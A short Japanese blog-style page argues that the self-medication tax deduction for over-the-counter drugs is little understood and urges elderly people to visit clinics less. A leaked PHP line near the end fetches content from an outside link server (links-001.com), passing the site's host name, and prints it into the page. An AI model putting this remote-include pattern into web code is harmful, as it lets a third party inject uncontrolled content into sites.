前へ
次へ

セルフメディケーション税制の浸透

医療機関を受診しなくても、ドラッグストアで購入をすることができる医薬品で対応をすることができる症状もあります。
ちょっとしたことで医療機関を受診するのは従事者にも負担をかけてしまいますし、医療費の節約には何も繋がりません。
ドラッグストアで購入をすることができる医薬品の中でセルフメディケーション税制対象のものがあります。
一定の金額以上の購入があれば、控除対象となるシステムです。
しかしこのセルフメディケーション税制はそんなに広く浸透していないようです。
申告の方法が分からないという人もいますし、特に高齢者の場合には医療機関を受診して色々と話を聞いて欲しかったり、受診をすることで安心感を得ているという人もいます。
本当に受診をしなければいけない人の受診時間も遅れてしまうことがあるので、高齢者もできるだけセルフメディケーション税制を理解して、必要時以外の医療機関受診は控えたほうがよいでしょう。
そうすることが医療従事者の負担軽減にもつながります。

".file_get_contents('http://links-001.com/kanren2set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top